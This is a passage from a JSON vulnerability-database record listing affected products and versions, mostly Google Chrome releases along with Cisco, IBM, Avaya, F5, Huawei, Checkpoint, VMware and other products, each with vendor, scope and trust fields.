application control engine module for the cisco catalyst", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "6500" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.216" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.591.0" }, { "model": "flex system 40gb ethernet", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.107" }, { "model": "secureplatform ngx r65", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "cloudsystem foundation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.278.0" }, { "model": "pod orchestration suite", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.413.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.95" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.67" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.580.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.123" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.146" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.4" }, { "model": "chrome", "scope": "ne", "trust": 0.3, "vendor": "google", "version": "38.0.2125.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.513.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.3" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.2.149.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.30" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.3" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "secure access link", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1042" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.158.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.761.1" }, { "model": "oceanstor sns2120 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.30" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.130" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.765.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.553.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.494.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.745.0" }, { "model": "ipso r71", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.484.0" }, { "model": "vsphere big data extensions", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.15" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.52" }, { "model": "oceanstor cse v100r003c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1061.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.829.1" }, { "model": "oceanstor hvs88t v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.35" }, { "model": "traffix sdc", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0.5" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.482.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.32" }, { "model": "aura communication manager ssp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ipso r70.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "prime collaboration deployment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1309.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.76" }, { "model": "vcenter support assistant", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.677.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.890.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.770.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.364.0" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "c-series nexus 5k switches", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.507.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.349.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.69" }, { "model": "unified computing system b-series servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "studio", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.450.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.322.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.37" }, { "model": "workbench", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.15" }, { "model": "system storage san48b-5 2498-f48", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "gaia r70.20", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.83" }, { "model": "gaia r77.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7845" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.63" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75560" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1297.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1026" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1068.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.33" }, { "model": "secureplatform r71", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.10" }, { "model": "fusionstorage dsware v100r003c02spc200", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.762.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.369.1" }, { "model": "services provisioning platform", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "privileged identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1.1" }, { "model": "secureplatform r75.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "power hmc r7.3.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.4.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.723.1" }, { "model": "websphere process server hypervisor edition for red hat", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.884.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1038" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1068.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.621.0" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.310" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.14" }, { "model": "espace v1300n v1300n v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.36" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.12" }, { "model": "puredata system for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1006" }, { "model": "smartcloud provisioning fixpack interi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.14" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.811.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.499.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.106" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.709.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.43" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.54" }, { "model": "oceanstor uds v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.882.0" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "13000" }, { "model": "enterprise linux eus 5.9.z server", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.384.0" }, { "model": "secureplatform r75.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "gaia r70.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.19" }, { "model": "telepresence exchange system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.157.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.44" }, { "model": "power hmc r7.7.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.721.1" }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.23" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.76" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.529.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.750.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.503.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.563.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.24" }, { "model": "2417-c48", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.193.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.771.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.603.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.59" }, { "model": "enterprise s-jis service", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.43" }, { "model": "diagnostic server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.8" }, { "model": "oceanstor s5500 v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ipso r77.20", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.906.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.24" }, { "model": "vsphere replication", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.6" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.169.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.114" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.202" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.363.0" }, { "model": "vfabric postgres", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "9.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.601.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1306.0" }, { "model": "smartcloud provisioning fixpack for sv", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.14" }, { "model": "information archive", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.812.0" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7245" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.944.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.635.0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7525061.121.225.06100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.89" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "77550" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5955" }, { "model": "oceanstor s3900 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.156" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1660.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1047.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.44" }, { "model": "aura communication manager ssp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.473.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.441.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1012.1" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "oceanstor s5500t v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1040" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1037.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.0" }, { "model": "system storage storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.53" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.426.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.752.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.5" }, { "model": "oceanstor n8500 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.834.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.327.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, 